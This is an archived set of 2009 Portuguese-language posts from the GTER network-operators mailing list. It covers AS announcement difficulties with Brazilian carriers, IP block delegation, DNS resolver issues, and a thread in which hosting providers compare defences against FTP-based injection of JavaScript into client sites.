detectam. >>>> >>>> Algu?m tamb?m est? passando por esse problema? >>>> Botei o clamav para verificar o upload dos FTP. Mas infelizmente, o >>>> Clamav >>>> n?o detecta esse javascript. >>>> >>>> >>>> []'s >>>> Alexandre Gorges >>>> http://algorges.blogspot.com >>>> http://www.dag.eti.br >>>> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com >>>> >>>> >>>> >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> Nenhum v?rus encontrado nessa mensagem recebida. >>>> Verificado por AVG - www.avgbrasil.com.br >>>> Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de >>>> Lan?amento: 05/30/09 05:53:00 >>>> >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> -- >> Cordialmente, >> >> Marcio Fernandes >> InfoLink - Hospedagem UNIX >> mfernandes at infolink.com.br >> http://dominio.infolink.com.br >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Cordialmente, Marcio Fernandes InfoLink - Hospedagem UNIX mfernandes at infolink.com.br http://dominio.infolink.com.br From itamar at ispbrasil.com.br Mon Jun 1 17:19:09 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Mon, 1 Jun 2009 17:19:09 -0300 Subject: [GTER] SA - Sistema Autonomo In-Reply-To: <1243882789550.Bruno@Openline.com.br> References: <1243882789550.Bruno@Openline.com.br> Message-ID: 2009/6/1 Bruno at Openline.com.br : > --- filipe mendes escreveu: >> Eu recebi meu AS ha uns 2 meses e estou numa eterna luta para publica-los >> nas operadoras tb.. > > Na OI eu nunca consegui. Na EBT e Intelig, razoavelmente f?cil. > Na CTBC, demora um pouco mas ? possivel sim. Na Telef nunca > tentei > > (O caso da OI merece uma reclama??o formal do CGI, pois eles > n?o querem fazer MESMO) por favor fa?a isto para nos!, > []s, !3runo > >> 2009/6/1 Alfredo Dal?Ava J?nior >> > - Faltou mais um requisito: ter muuuita paci?ncia e ligar para os >> > consultores e 0800 das operadoras 2 vezes por dia... >> > Eu mesmo estou fazendo isso a mais de 45 dias e at? agora nada... > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From thilizardo at gmail.com Mon Jun 1 17:20:15 2009 From: thilizardo at gmail.com (Thiago Lizardo de Moraes) Date: Mon, 1 Jun 2009 17:20:15 -0300 Subject: [GTER] =?iso-8859-1?q?Fwd=3A_Problemas_com_resolu=E7=E3o_de_nomes?= =?iso-8859-1?q?_-_Resolver/DNS_BrasilTelecom?= In-Reply-To: References: Message-ID: <9697f7750906011320p3f53bd6cm7f1467e301cd9268@mail.gmail.com> Ricardo, Gostaria de saber apenas se usuarios de outros ISPs que utilizam os Resolvers da BrT est?o com problema de navega??o. A principio parece que foi aplicado algum filtro baseado no IP de origem da requisi??o...Comecei a perceber este comportamento desde o ultimo sabado, [ ]'s, Thiago Lizardo de Moraes -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Ricardo Rodrigues Enviada em: segunda-feira, 1 de junho de 2009 11:36 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER]Problemas com resolu??o de nomes - Resolver/DNS BrasilTelecom Oi Thiago, seja mais espec?fico na sua pergunta e podemos ajudar melhor. Qual mudan?a voc? notou? Por qu? a pergunta? Abra?os, Ricardo 2009/6/1 Thiago Lizardo de Moraes : > Pessoal, > > Voc?s perceberam problemas referente a resolu??o de > Nomes(Resolver) da BrasilTelecom? Sabem se ocorreu algum cenario de mudan?a > de endere?o IP, filtros por IPs de origem(resolvendo somente para IPs da > BrT), redirecionamento, etc. > Obrigado, > -- > Thiago Lizardo de Moraes > Consultor T?cnico > +55 41 8838 8561 > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter -- Thiago Lizardo de Moraes Consultor T?cnico +55 41 8838 8561 From frederick at dahype.org Mon Jun 1 18:43:17 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 1 Jun 2009 17:43:17 -0400 Subject: [GTER] RES: SA - Sistema Autonomo In-Reply-To: <1243882789550.Bruno@Openline.com.br> References: <1243882789550.Bruno@Openline.com.br> Message-ID: E o melhor da OI ? que algumas vezes para que seu AS seja aprovado pelo registro.br, eles pedem que todos os blocos que voc? declarou como seus no formul?rio estejam, no sistema do registro.br delegados para seu CNPJ. E algumas vezes tem blocos l? da OI que nem seus s?o mais, mas que a OI ainda deixa sob seu ID e o contr?rio, blocos que realmente s?o seus n?o s?o delegados, mesmo que o DNS reverso esteja funcionando Enfim, operadora desprez?vel. Aproveitando, o consultor deles me informou que para um melhor atendimento, fora da 'massa' do 0800 corporativo ? necess?rio um upgrade de contrato... aonde o n?mero de atendimento ? outro, com maior qualidade e sem passar por "atendentes robotizados" que n?o sabem a diferen?a do dia e da noite. Algu?m sabe se isto procede e se funciona? > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Bruno at Openline.com.br > Enviada em: segunda-feira, 1 de junho de 2009 16:00 > Para: gter at eng.registro.br > Assunto: Re: [GTER] SA - Sistema Autonomo > > --- filipe mendes escreveu: > > Eu recebi meu AS ha uns 2 meses e estou numa eterna luta para > publica-los > > nas operadoras tb.. > > Na OI eu nunca consegui. Na EBT e Intelig, razoavelmente f?cil. > Na CTBC, demora um pouco mas ? possivel sim. Na Telef nunca > tentei > > (O caso da OI merece uma reclama??o formal do CGI, pois eles > n?o querem fazer MESMO) > > []s, !3runo > > > 2009/6/1 Alfredo Dal?Ava J?nior > > > - Faltou mais um requisito: ter muuuita paci?ncia e ligar para os > > > consultores e 0800 das operadoras 2 vezes por dia... > > > Eu mesmo estou fazendo isso a mais de 45 dias e at? agora nada... > -- > gter list https://eng.registro.br/mailman/listinfo/gter From jb at RedePegasus.com.br Mon Jun 1 18:49:28 2009 From: jb at RedePegasus.com.br (JB (Pegasus)) Date: Mon, 01 Jun 2009 18:49:28 -0300 Subject: [GTER] =?iso-8859-1?q?BGP_na_Telef=F4nica?= In-Reply-To: <9697f7750906011320p3f53bd6cm7f1467e301cd9268@mail.gmail.com> References: <9697f7750906011320p3f53bd6cm7f1467e301cd9268@mail.gmail.com> Message-ID: <4A244CE8.5050301@RedePegasus.com.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Ol? Pessoal, Algu?m com experi?ncia em BGP x Telef?nica que possa dar o caminho das pedras? Obrigado, Juli?o -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKJEzoC6YpaEL3LVERAismAJ96QnFueV+2x9opmPlKUYH7CAX2bACgxHId iCxW7L0nSczHhIVzVUteg7Y= =GkWL -----END PGP SIGNATURE----- From jb at RedePegasus.com.br Mon Jun 1 18:58:34 2009 From: jb at RedePegasus.com.br (JB (Pegasus)) Date: Mon, 01 Jun 2009 18:58:34 -0300 Subject: [GTER] Blocos IP da Oi preso em seu ID In-Reply-To: References: <1243882789550.Bruno@Openline.com.br> Message-ID: <4A244F0A.2040204@RedePegasus.com.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 N?o seria o caso, do Registro.br permitir a renuncia ao ID t?cnico retornando a responsabilidade diretamente para a concession?ria, como deveria ser? Acho que al?m de n?s, o CERT.br ficaria agradecido ... []s, Juli?o Renato Frederick escreveu: > E o melhor da OI ? que algumas vezes para que seu AS seja aprovado pelo > registro.br, eles pedem que todos os blocos que voc? declarou como seus no > formul?rio estejam, no sistema do registro.br delegados para seu CNPJ. > > E algumas vezes tem blocos l? da OI que nem seus s?o mais, mas que a OI > ainda deixa sob seu ID e o contr?rio, blocos que realmente s?o > seus n?o s?o delegados, mesmo que o DNS reverso esteja funcionando > > Enfim, operadora desprez?vel. > > Aproveitando, o consultor deles me informou que para um melhor atendimento, fora da 'massa' do 0800 corporativo ? necess?rio um upgrade de contrato... aonde o n?mero de atendimento ? outro, com maior qualidade e sem passar por "atendentes robotizados" que n?o sabem a diferen?a do dia e da noite. Algu?m sabe se isto procede e se funciona? > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKJE8KC6YpaEL3LVERApg+AJ0YGW3P+t936wVipVFQqONS2TDCdgCgkpy6 KGALtDrt1CKI3InxwUMT7vk= =HN/S -----END PGP SIGNATURE----- From MBORBA at trf3.jus.br Mon Jun 1 19:04:52 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Mon, 01 Jun 2009 19:04:52 -0300 Subject: [GTER] RES: SA - Sistema Autonomo In-Reply-To: References: <1243882789550.Bruno@Openline.com.br> Message-ID: <4A242654.15A6.0046.0@trf3.jus.br> Exig?ncia esquisita. Se voc? passou por todo o processo de obten??o do AS no Registro .br, de quem mais poderiam ser os dados do propriet?rio do "netblock"? -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- Em 1/6/2009 ?s 18:43, Renato Frederick gravou: > E o melhor da OI ? que algumas vezes para que seu AS seja aprovado pelo > registro.br, eles pedem que todos os blocos que voc? declarou como seus no > formul?rio estejam, no sistema do registro.br delegados para seu CNPJ. [...] From lscrlstld at gmail.com Mon Jun 1 19:27:32 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Mon, 1 Jun 2009 19:27:32 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__BGP_na_Telef=F4nica?= In-Reply-To: <4A244CE8.5050301@RedePegasus.com.br> References: <9697f7750906011320p3f53bd6cm7f1467e301cd9268@mail.gmail.com> <4A244CE8.5050301@RedePegasus.com.br> Message-ID: Eu solicitei via um gestor t?cnico que apoia meu gerente de contas. At? q foi r?pido. > > Ol? Pessoal, > > Algu?m com experi?ncia em BGP x Telef?nica que possa dar o > caminho das pedras? > > Obrigado, > > Juli?o From juliano at cyberweb.com.br Mon Jun 1 20:09:26 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Mon, 01 Jun 2009 20:09:26 -0300 Subject: [GTER] RES: SA - Sistema Autonomo In-Reply-To: <4A242654.15A6.0046.0@trf3.jus.br> References: <1243882789550.Bruno@Openline.com.br> <4A242654.15A6.0046.0@trf3.jus.br> Message-ID: <4A245FA6.9080308@cyberweb.com.br> Eu delego alguns blocos para CPF/CNPJ de clientes que os utilizam. Juliano MARLON BORBA escreveu: > Exig?ncia esquisita. Se voc? passou por todo o processo de obten??o do > AS no Registro .br, de quem mais poderiam ser os dados do propriet?rio > do "netblock"? > > > From algorges at gmail.com Mon Jun 1 20:19:01 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Mon, 01 Jun 2009 20:19:01 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_V=EDrus_em_sites?= In-Reply-To: <4A242F23.9070900@infolink.com.br> Message-ID: Marcio, Come?amos a tomar essa medida, bloqueando a classe ip do atacante para acesso ftp ao servidor. []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > From: Marcio Fernandes > Reply-To: Lista GTER > Date: Mon, 01 Jun 2009 16:42:27 -0300 > To: Lista GTER > Subject: Re: [GTER] RES: V?rus em sites > > Alexandre, > > N?o sei qual a natureza do seu acesso e nem o perfil de seu cliente, mas > uma id?ia ? bloquear portas de FTP para origens que n?o sejam de seu > interesse. > > Por exemplo, se voc? n?o tem clientes da Russia, China, Pol?nia e > correlatos, uma id?ia ? bloquear esse pessoal. > > Repito, n?o sei se isso atrapalharia o perfil de seus clientes, mas pode > ajudar na hora do tiroteio. > > []s > Marcio Fernandes > >> ? isso que estou falando a tempo. >> N?o tem problema no servidor. Os sites s?o alterados via ftp. >> Nem sempre o problema ? no servidor. :) >> >> Segue um peda?o do meu log de FTP. >> >> 83.143.81.10 - shine [06/Apr/2009:22:16:19 -0000] "GET >> /home/sites/cliente.com.br/web/teste/lytebox.js" 200 38957 >> 83.143.81.10 - shine [06/Apr/2009:22:16:24 -0000] "PUT >> /home/sites/cliente.com.br/web/teste/lytebox.js" 200 38990 >> 83.143.81.10 - shine [06/Apr/2009:22:16:55 -0000] "GET >> /home/sites/cliente.com.br/web/index.htm" 200 1375 >> 83.143.81.10 - shine [06/Apr/2009:22:16:57 -0000] "PUT >> /home/sites/cliente.com.br/web/index.htm" 200 1386 >> >> Como podem ver, a pessoa puxa o arquivo do site no servidor e logo em >> seguida coloca o arquivo j? com o script. >> >> Como se fosse um echo "script" >> index.htm >> >> O script aparece ou no come?o do arquivo ou no final. >> >> E volto a dizer, n?o ? feito nada no servidor, n?o foi colocado nenhum >> arquivo ou script no servidor. Simplesmente ? acesso via FTP e trocado os >> arquivos. >> >> Coloquei o clamav em conjunto com meu servidor de FTP, a cada upload o >> clamav verifica. Alguns scripts o clamav tem encontrado. Tem dado uma ajuda. >> >> []'s >> Alexandre Gorges >> http://algorges.blogspot.com >> http://www.dag.eti.br >> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com >> >> >> >> >>> From: Marcio Fernandes >>> Reply-To: Lista GTER >>> Date: Mon, 01 Jun 2009 13:17:21 -0300 >>> To: Lista GTER >>> Subject: Re: [GTER] RES: V?rus em sites >>> >>> Realmente, assim como o Juliano, tamb?m experimentamos estes tipos de >>> eventos por aqui (InfoLink). >>> >>> Servidores de hospedagem est?tica, ou seja, sem PHP, ASP, JSP, MySQL, etc. >>> >>> Analisando os LOGs de FTP (s?o diversos IPs que fazem acessos >>> fidedignos, normalmente internacionais: China, Russia, Pol?nia, entre >>> outros), comprovamos a a??o a informamos aos nossos clientes. >>> >>> Logo, a capta??o da senha se d? no lado do cliente, principalmente >>> quando os mesmos fazem acesso ao FTP atrav?s de cybercaf?s, faculdades, >>> redes p?blicas, etc. >>> >>> []s >>> Marcio Fernandes >>> >>>> Cleber, >>>> >>>> Sim, vem por FTP, normalmente IP internacional. O problema ocorre com >>>> sites com HTML, sem nada de PHP, sem permissao de execucao PHP, servidor >>>> cujo acesso ? realizado apenas pelo cliente, sem furos, sem ser >>>> shared... sem asp, sem jsp, mysql... ocorreu. >>>> >>>> Juliano >>>> >>>> Cleber - Listas escreveu: >>>>> Alexandre, >>>>> Tem certeza que est? vindo via FTP, pois hoje em dia isso pode ocorrer de >>>>> maneiras: >>>>> >>>>> *) Via FTP mesmo, pois o cliente pode ter um trojan instalado na >>>>> maquina que >>>>> fica monitorando e depois quando for transferir uma pagina index ou >>>>> default, >>>>> o javascript vai junto (j? ocorreu com cliente nosso) >>>>> >>>>> *) Via Upload, alguma pagina ASP ou PHP mal programada aceita o upload >>>>> de um >>>>> outro .ASP ou .PHP que se auto propaga em seu servidor nos diret?rios que >>>>> tem permissao de escrita. >>>>> >>>>> Recomenda??o, somente libere escrita para os clientes que o solicitem e >>>>> tenha um registro em hepldesk, excel ou at? mesmo em papel de p?o :) >>>>> >>>>> Se o caso realmente est? vindo via FTP, verifique para fazer bloqueios de >>>>> IP's e avise seus usu?rios, por exemplo se sabe que o dominio >>>>> abc.com.br tem >>>>> acesso NET, fa?a um bloquei para a rede da NET do acesso ao dominio >>>>> via FTP, >>>>> ? uma forma de ir isolando o problema e chegar at? a fonte. >>>>> >>>>> Espero ter ajudado. >>>>> >>>>> Cleber >>>>> >>>>> >>>>> -----Mensagem original----- >>>>> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em >>>>> nome de Alexandre Gorges >>>>> Enviada em: s?bado, 30 de maio de 2009 14:54 >>>>> Para: Lista GTER >>>>> Assunto: [GTER] V?rus em sites >>>>> >>>>> Boa tarde, >>>>> Faz alguns 15 dias, que estou com problemas em alguns sites de clientes. >>>>> N?o sei como ? descoberto a senha de FTP dos sites, mas o acesso sempre ? >>>>> internacional. ? adicionado um javascript em todas as p?ginas do site >>>>> do cliente. Alguns >>>>> antivirus n?o detectam, mas outros como Avast, AVG e Symantec detectam. >>>>> >>>>> Algu?m tamb?m est? passando por esse problema? >>>>> Botei o clamav para verificar o upload dos FTP. Mas infelizmente, o >>>>> Clamav >>>>> n?o detecta esse javascript. >>>>> >>>>> >>>>> []'s >>>>> Alexandre Gorges >>>>> http://algorges.blogspot.com >>>>> http://www.dag.eti.br >>>>> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com >>>>> >>>>> >>>>> >>>>> -- >>>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>>> Nenhum v?rus encontrado nessa mensagem recebida. >>>>> Verificado por AVG - www.avgbrasil.com.br >>>>> Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de >>>>> Lan?amento: 05/30/09 05:53:00 >>>>> >>>>> -- >>>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>>> >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> >>> >>> -- >>> Cordialmente, >>> >>> Marcio Fernandes >>> InfoLink - Hospedagem UNIX >>> mfernandes at infolink.com.br >>> http://dominio.infolink.com.br >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > > -- > Cordialmente, > > Marcio Fernandes > InfoLink - Hospedagem UNIX > mfernandes at infolink.com.br > http://dominio.infolink.com.br > -- > gter list https://eng.registro.br/mailman/listinfo/gter From frederick at dahype.org Mon Jun 1 21:04:23 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 1 Jun 2009 20:04:23 -0400 Subject: [GTER] RES: RES: SA - Sistema Autonomo In-Reply-To: <4A245FA6.9080308@cyberweb.com.br> References: <1243882789550.Bruno@Openline.com.br> <4A242654.15A6.0046.0@trf3.jus.br> <4A245FA6.9080308@cyberweb.com.br> Message-ID: N?o sei da exig?ncia, sei que em uma das requisi??es que fiz para meus clientes, o registro.br informou que um bloco /29 que tinha informado como meu n?o estava delegado para o CNPJ do provedor e pediu que eu resolvesse isto. Feito isto o processo continuou, tudo bem que 6meses depois este bloco foi devolvido para operadora, pois j? t?nhamos AS e ? claro que at? hoje o provedor fica como respons?vel no registro.br e a operadora n?o tira mais.. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Juliano Primavesi - Cyberweb Networks > Enviada em: segunda-feira, 1 de junho de 2009 20:09 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: SA - Sistema Autonomo > > > Eu delego alguns blocos para CPF/CNPJ de clientes que os utilizam. > > Juliano > > MARLON BORBA escreveu: > > Exig?ncia esquisita. Se voc? passou por todo o processo de obten??o > do > > AS no Registro .br, de quem mais poderiam ser os dados do > propriet?rio > > do "netblock"? > > > > > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From frederick at dahype.org Mon Jun 1 21:06:33 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 1 Jun 2009 20:06:33 -0400 Subject: [GTER] RES: Blocos IP da Oi preso em seu ID In-Reply-To: <4A244F0A.2040204@RedePegasus.com.br> References: <1243882789550.Bruno@Openline.com.br> <4A244F0A.2040204@RedePegasus.com.br> Message-ID: Sim, ou ent?o um meio de contato direto com o registro.br para que casos isolados assim possam ser resolvidos por ele, pois ? muito normal isto acontecer. E vai que este bloco de IP se meta em uma confus?o federal, literalmente falando. At? provar as coisas.. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de JB (Pegasus) > Enviada em: segunda-feira, 1 de junho de 2009 18:59 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: [GTER] Blocos IP da Oi preso em seu ID > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > N?o seria o caso, do Registro.br permitir a renuncia ao ID t?cnico > retornando a responsabilidade diretamente para a concession?ria, como > deveria ser? > > Acho que al?m de n?s, o CERT.br ficaria agradecido ... > From Bruno at Openline.com.br Mon Jun 1 21:08:30 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Mon, 01 Jun 2009 21:08:30 -0300 Subject: [GTER] SA - Sistema Autonomo Message-ID: <1243901310722.Bruno@Openline.com.br> --- Itamar Reis Peixoto escreveu: > > (O caso da OI merece uma reclama??o formal do CGI, pois eles > > n?o querem fazer MESMO) > > por favor fa?a isto para nos!, vai ter reuni?o do GTER este m?s. que tal os incomodados em bloco apresentar a reclama??o?? !3runo Cabral From Bruno at Openline.com.br Mon Jun 1 21:11:26 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Mon, 01 Jun 2009 21:11:26 -0300 Subject: [GTER] RES: SA - Sistema Autonomo Message-ID: <1243901486883.Bruno@Openline.com.br> --- Renato Frederick escreveu: > Enfim, operadora desprez?vel. > > Aproveitando, o consultor deles me informou que para um melhor > atendimento, fora da 'massa' do 0800 corporativo ? necess?rio > um upgrade de contrato... aonde o n?mero de atendimento ? outro, > com maior qualidade e sem passar por "atendentes robotizados" > que n?o sabem a diferen?a do dia e da noite. Algu?m sabe se isto > procede e se funciona? Isto n?o foi requerido para a anu?ncia da compra da BrT pela Oi? Um servi?o de atendimento para operadoras? Dos atendimentos que utilizo o da Intelig ? de longe o melhor de todos. Em poucos segundos sou atendido, quem responde consegue verificar o problema sem transferir para ningu?m, e geralmente resolve durante o atendimento (bem, 40-50 minutos no telefone n?o ? mole mas como os problemas s?o raros, d? para aturar) J? o da Embratel parece VoIP. Se houver problema com a Internet, nunca se consegue completar a liga??o. Quando a Internet "volta" "milagrosamente" voc? consegue falar com o atendente (que n?o abre o chamado porque est? "tudo funcionando") O da Oi eu n?o fa?o coment?rios []s, !3runo Cabral From Bruno at Openline.com.br Mon Jun 1 21:13:36 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Mon, 01 Jun 2009 21:13:36 -0300 Subject: [GTER] RES: SA - Sistema Autonomo Message-ID: <1243901616084.Bruno@Openline.com.br> Eu entendi que os blocos DA OPERADORA que ele informar no formul?rio (cidr-request) devem estar alocados para ele no registro.br. Seria isso? []s, !3runo Cabral --- "MARLON BORBA" escreveu: > Exig?ncia esquisita. Se voc? passou por todo o processo de obten??o do > AS no Registro .br, de quem mais poderiam ser os dados do propriet?rio > do "netblock"? > > > Abra?os, > > Marlon Borba > > Em 1/6/2009 ?s 18:43, Renato Frederick gravou: > E o melhor da OI ? que algumas vezes para que seu AS seja aprovado > pelo registro.br, eles pedem que todos os blocos que voc? declarou > como seus no formul?rio estejam, no sistema do registro.br delegados > para seu CNPJ. > > [...] From moreiras at nic.br Mon Jun 1 21:53:26 2009 From: moreiras at nic.br (Antonio M. Moreiras) Date: Mon, 01 Jun 2009 21:53:26 -0300 Subject: [GTER] e-learning IPv6 do NIC.br Message-ID: <4A247806.20301@nic.br> Senhores, Dando continuidade ?s a??es do CGI.br e NIC.br em favor do uso do IPv6 no Brasil, entrou hoje em funcionamento o site: http://curso.ipv6.br com nosso "Curso de Introdu??o ao IPv6" em formato e-learning. Esperamos que seja ?til! Por gentileza, divulguem. Atenciosamente, -- Antonio M. Moreiras moreiras at nic.br http://www.ceptro.br From mfernandes at infolink.com.br Mon Jun 1 21:29:51 2009 From: mfernandes at infolink.com.br (Marcio Fernandes) Date: Mon, 01 Jun 2009 21:29:51 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_V=EDrus_em_sites?= In-Reply-To: References: Message-ID: <4A24727F.6040606@infolink.com.br> Alexandre, Segundo nossa experi?ncia com shared hosting, os IPs s?o distribu?dos e de diversos continentes. De fato, essa classe IP em quest?o voc? bloqueou, mas certamente vir?o outras, ? recomend?vel ficar de olho. Ou ent?o, partir pra uma solu??o mais xiita e procurar as classes IPs de pa?ses que n?o s?o tr?fego de seu interesse (nem de seus clientes), liberando caso-a-caso. []s Marcio Fernandes > Marcio, > > Come?amos a tomar essa medida, bloqueando a classe ip do atacante para > acesso ftp ao servidor. > > > []'s > Alexandre Gorges > http://algorges.blogspot.com > http://www.dag.eti.br > MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > From algorges at gmail.com Tue Jun 2 08:19:50 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Tue, 02 Jun 2009 08:19:50 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_V=EDrus_em_sites?= In-Reply-To: <4A24727F.6040606@infolink.com.br> Message-ID: Obrigado pela dica Marcio. []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > From: Marcio Fernandes > Reply-To: Lista GTER > Date: Mon, 01 Jun 2009 21:29:51 -0300 > To: Lista GTER > Subject: Re: [GTER] RES: V?rus em sites > > Alexandre, > > Segundo nossa experi?ncia com shared hosting, os IPs s?o distribu?dos e > de diversos continentes. > > De fato, essa classe IP em quest?o voc? bloqueou, mas certamente vir?o > outras, ? recomend?vel ficar de olho. > > Ou ent?o, partir pra uma solu??o mais xiita e procurar as classes IPs de > pa?ses que n?o s?o tr?fego de seu interesse (nem de seus clientes), > liberando caso-a-caso. > > []s > Marcio Fernandes > >> Marcio, >> >> Come?amos a tomar essa medida, bloqueando a classe ip do atacante para >> acesso ftp ao servidor. >> >> >> []'s >> Alexandre Gorges >> http://algorges.blogspot.com >> http://www.dag.eti.br >> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From frederick at dahype.org Tue Jun 2 09:23:22 2009 From: frederick at dahype.org (Renato Frederick) Date: Tue, 2 Jun 2009 08:23:22 -0400 Subject: [GTER] RES: RES: SA - Sistema Autonomo In-Reply-To: <1243901616084.Bruno@Openline.com.br> References: <1243901616084.Bruno@Openline.com.br> Message-ID: Exatamente. Os blocos das operadoras que voc? afirma ter conectividade, que voc? declara no formul?rio devem estar alocados para o CNPJ que voc? declarou no formul?rio. S? n?o sei se o registro.br faz a verifica??o inversa - blocos que est?o em seu CNPJ, se voc? n?o declarar se d? algum problema na aprova??o. Se der problema, dificulta em muito 'blocos esquecidos'. Tenho cliente que a SETE ANOS tinha um link com a OI e at? hoje os blocos est?o em seu CNPJ e seu DNS prim?rio(que nem ? da OI) at? hoje recebe consultas sobre o bloco reverso /29... Ou seja, declararam o reverso para 'ns1.dominio.com.br' e n?o removeram tamb?m. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Bruno at Openline.com.br > Enviada em: segunda-feira, 1 de junho de 2009 21:14 > Para: gter at eng.registro.br > Assunto: Re: [GTER] RES: SA - Sistema Autonomo > > Eu entendi que os blocos DA OPERADORA que ele informar no formul?rio > (cidr-request) devem estar alocados para ele no registro.br. Seria > isso? > > []s, !3runo Cabral > > --- "MARLON BORBA" escreveu: > > Exig?ncia esquisita. Se voc? passou por todo o processo de obten??o > do > > AS no Registro .br, de quem mais poderiam ser os dados do > propriet?rio > > do "netblock"? > > > > > > Abra?os, > > > > Marlon Borba > > > > Em 1/6/2009 ?s 18:43, Renato Frederick gravou: > > E o melhor da OI ? que algumas vezes para que seu AS seja aprovado > > pelo registro.br, eles pedem que todos os blocos que voc? declarou > > como seus no formul?rio estejam, no sistema do registro.br delegados > > para seu CNPJ. > > > > [...] > -- > gter list https://eng.registro.br/mailman/listinfo/gter From edinilson at atinet.com.br Tue Jun 2 10:28:22 2009 From: edinilson at atinet.com.br (Edinilson - ATINET) Date: Tue, 2 Jun 2009 10:28:22 -0300 Subject: [GTER] =?iso-8859-1?q?=22Cyberwar=22=3A_=22Obama_cria_=27=27ciber?= =?iso-8859-1?q?-czar=27=27_para_seguran=E7a_virtual=22_+_IDGNow!_E?= =?iso-8859-1?q?special=3A_=22Seguran=E7a_no_Governo=22?= Message-ID: <8ACA9843A51D41C0986B3FFF49C46FF3@atinet.com.br> Fonte: Estad?o [30/05/09] Obama cria ''ciber-czar'' para seguran?a virtual Fonte: Estad?o [30/05/09] Pent?gono ter? unidade militar para guerra online Fonte: Converg?ncia Digital [29/05/09] Seguran?a Cibern?tica ? prioridade nacional nos EUA Fonte: Converg?ncia Digital - Especial "Seguran?a no Governo" [11/05/09] A dif?cil arte de elaborar uma Pol?tica Nacional de Seguran?a da Informa??o por Lu?s Osvaldo Grossman Fonte: Converg?ncia Digital - Especial "Seguran?a no Governo" [11/05/09] Brasil prepara especialistas para combater o cybercrime na AL por Lu?s Osvaldo Grossmann Fonte: Converg?ncia Digital - Especial "Seguran?a no Governo" [11/05/09] Uma ?nica rede do Governo Federal sofreu tr?s milh?es de ataques em 2008 por Lu?s Osvaldo Grossmann From eschoedler at viavale.com.br Tue Jun 2 11:36:04 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Tue, 2 Jun 2009 11:36:04 -0300 Subject: [GTER] =?iso-8859-1?q?Freeradius=3A_atributos_de_checagem_do_grup?= =?iso-8859-1?q?o_n=E3o_funcionam?= References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br> Message-ID: Senhores. Estou com um problema engra?ado aqui. Levantei um servidor Freeradius com backend mysql. Ele est? autenticando usu?rio normalmente... por?m, os atributos de checagem do grupo n?o est?o funcionando direito. 